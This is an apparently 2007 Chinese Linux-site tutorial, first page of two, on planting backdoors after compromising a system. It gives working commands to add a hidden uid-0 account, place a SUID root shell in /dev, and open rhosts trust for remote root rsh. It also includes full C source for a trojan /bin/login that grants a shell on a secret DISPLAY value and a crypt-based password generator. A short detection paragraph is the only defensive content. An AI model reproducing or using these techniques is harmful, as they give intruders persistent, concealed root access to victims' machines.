首页 | 资讯动态 | linux基础 | 系统管理 | 网络管理 | 编程开发 | linux数据库 | 服务器技术 | linux相关 | linux认证 | 嵌入式 | 下载中心 | 专题 | linux招聘 | 镜像站
OKLinux中文技术站
·设为首页
·加入收藏
·联系我们
系统管理: 中文环境 系统管理 桌面应用 内核技术 | Linux基础: 基础入门 安装配置 常用命令 经验技巧 软件应用 | Linux数据库: Mysql Postgre Oracle DB2 Sybase other
网络管理: 网络安全 网络应用 Linux服务器 环境配置 黑客安全 | 编程开发: PHP CC++ Python Perl Shell 嵌入式开发 java jsp | PHP技术: PHP基础 PHP技巧 PHP应用 PHP文摘
Linux资讯 Linux招聘 Linux专题 Apache | Linux相关: 硬件相关 Linux解决方案 Linux认证 企业应用 其它Unix | 相关下载: 资料下载 参考手册 开发工具 服务器类 软路由 其它
 技术搜索:
会员中心 注册会员 高级搜索  
  → 当前位置:首页>网络管理>黑客安全>正文

黑客高级技巧 Linux后门技术及实践

http://www.oklinux.cn  2007-04-30  来源: 赛迪网 sixth  会员收藏  游客收藏  【 】 

后门简介

 

入侵者完全控制系统后,为方便下次进入而采用的一种技术。一般通过修改系统配置文件和安装第三方后门工具来实现。 具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。

 

常用后门技术

 

增加超级用户账号

破解/嗅探用户密码

放置SUID Shell

rhosts + +

利用系统服务程序

TCP/UDP/ICMP Shell

Crontab定时任务

共享库文件

工具包rootkit

可装载内核模块(LKM)

 

增加超级用户

 

 

# echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd 
# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

如果系统不允许uid=0的用户远程登录,还需要增加一个普通用户账号。

 

破解/嗅探用户密码

 

获得shadow文件后,用John the Ripper 工具破解薄弱的用户密码。安装sniffit等嗅探工具,监听telnet、ftp等端口,收集用户密码。

 

放置SUID Shell

 

 

# cp /bin/bash /dev/.rootshell 
# chmod u+s /dev/.rootshell

 

普通用户在本机运行/dev/.rootshell,即可获得一个root权限的shell。

 

 

rhosts + + 

# echo "+ +" > /.rhosts 
# rsh -l root victim.com csh -i

 

远程可以得到一个rootshell。

利用系统服务程序。

 

修改/etc/inetd.conf, daytime stream tcp nowait /bin/sh sh -I ;用trojan程序替换in.telnetd、in.rexecd等inted的服务程序,重定向login程序。

 

TCP/UDP/ICMP Shell

 

BindShell,大部分是基于TCP/UDP协议的网络服务程序,在高端口监听,很容易被发现。Ping Backdoor,通过ICMP包激活后门,形成一个Shell通道。TCP ACK数据包后门,能够穿越防火墙。

 

Crontab定时任务

 

通过Crontab程序调度已安装的后门程序定时运行,一般在深夜时段,是系统管理员不在线的时间。

 

共享库文件

 

在共享库中嵌入后门函数使用后门口令激活Shell,获得权限能够躲避系统管理员对二进制文件本身的校验。

 

工具包Rootkit

 

包含一系列系统及后门工具:

 

- 清除日志中的登录记录

- 伪装校验和

- 替换netstat、ps等网络工具

- 后门登录程序易于安装和使用

 

可装载内核模块(LKM)

 

LKM:Loadable Kernel Modules 动态的加载,不需要重新编译内核。

 

截获系统调用,具有隐藏目录、文件、进程、网络连接等强大功能。

 

自身隐蔽性好,发现难度较大。

 

著名的LKM包有adore和knark。

 

后门的检测

 

以自己的经验,结合特定的工具,手工作一些检测。使用Tripwire或md5校验来检查系统。借助IDS系统,监听到目标机器的可疑网络连接。

 

实例:Login后门

 

入侵者先把原始的/bin/login备份,再用一段程序替换/bin/login。入侵者telnet登录进来的时候,通过环境变量或者终端类型,传递了正确的后门密码,将直接获得一个Shell;如果是普通用户登录,将会重定向到原始的login文件,来处理正常的登录。

 

最简单的login后门ulogin.c源代码如下:

 

实例:login后门

 

 

#include <stdio.h> 
#define PASSWORD "passWORD" 
#define _PATH_LOGIN "/sbin/logins" 

main (argc, argv, envp) 
int argc; 
char **argv, **envp; 
{ 
 char *display = getenv("DISPLAY"); 
 if ( display == NULL ) { 
  execve(_PATH_LOGIN, argv, envp); 
  perror(_PATH_LOGIN); 
  exit(1); 
 } 
 if (!strcmp(display,PASSWORD)) { 
  system("/bin/csh"); 
  exit(1); 
 } 
 execve(_PATH_LOGIN, argv, envp); 
 exit(1); 
}

 

利用后门登录

 

首先Telnet服务是打开的,在自己机器上:

 

 

bash$ export DISPLAY=passWORD 
bash$ telnet victim.com 
Trying xxx.xxx.xxx.xxx... 
Connected to victim.com (xxx.xxx.xxx.xxx). 
Escape character is '^]'. 
% _

 

Strings命令

 

strings命令能够打印出二进制文件中的可显示字符串,用于刚才的ulogin程序:

 

 

bash$ strings ulogin 
/lib/ld-linux.so.2 
.............. 
DISPLAY 
/sbin/logins 
passWORD 
/bin/csh

 

加密后门密码

 

1,采用DES算法,即crypt( )函数,编写gen.c程序:

 

 

#include <unistd.h> 
main(int argc, char *argv[]) 
{ 
if (argc != 3) { 
printf("usage: %s <password> <salt>\n", argv[0]); 
exit(1); 
} 
printf("%s\n", crypt(argv[1], argv[2])); 
}

 

2、编译为gen,执行./gen hack ui,得到的shadow结果为UiVqMWvDrIQjA。

共2页: 上一页 1 [2] 下一页

上一篇:Linux系统下C语言编程工具详细介绍   下一篇:Linux操作系统的实用性和针对性介绍


收藏于收藏夹】 【评论】 【推荐】 【打印】 【关闭
相关文档
·告诉你互联网上什么病毒和木马最普遍
·威胁决定安全 全面抵御来自网络的攻击
·破坏硬件的又一病毒“马吉斯”浮出水面
·微软Windows系统安全十大隐患服务细评
·原位升级拯救Windows XP崩溃的稻草
·移动数字版权管理的安全经
·窥视计算机病毒的磁盘存储结构
·认识“零零”提防从网络游戏传来的危险
·用户谨慎风暴蠕虫生变种攻击力大大提高
·病毒制作者们在互联网上的激烈竞争
·驱除毒源双击无法打开驱动器的杀毒方法
·恶意邮件蠕虫假冒安全更新引诱用户上当
·钓鱼网站卖奥运门票奥组委称尚未发售
·Word 2007出现3个新漏洞使系统无法使用
·铲除病毒攻击两大威胁 走近Linux防护
·病毒古董可让用户电脑完全受控于黑客
发表评论
密码: 匿名评论
评论内容:

(不超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规)
 
  最新文档
·服务器虚拟化安全管理10大步骤
·安全学习之SUSE 防火墙设置
·手工搞定那可恶的ARP病毒
·Linux主机安全设置经验之谈
·下周慎防AUTO地鼠器病毒 Linux系统不受
·Linux主机防DDOS和CC攻击的方案探析
·Linux操作系统安全知识集
·Linux主机开启后门的几种办法
·Linux服务器安全技术分析
·Linux系统在企业安全管理中的应用
·Linux少病毒主要原因是编写出来找不到
·简单设置让你的Linux系统更安全
  阅读排行
·Ethereal使用教程
·为Linux服务器部署高效防毒软件
·从Linux内核的漏洞角度考虑系统安全
·用Apache Proxy的指令改进LAMP安全性
·linux安全:Linux ACL 体验
·玩转Ubuntu Linux之加密文件系统篇
·操作系统安全防护技巧介绍之Linux篇
·通过Linux工具来全面保障无线网络安全
·使用SSL 保护VNC应用程序
·通过Linux系统伪装方法加固系统安全
·MPPE加密VPN服务器详解
·使用mod_proxy改进LAMP 安全
·增强Linux/Unix服务器系统安全性介绍
·构筑Unix系统防火墙体系的多种解决方案
·在breezy安装AntiVir的全攻略
网摘收藏: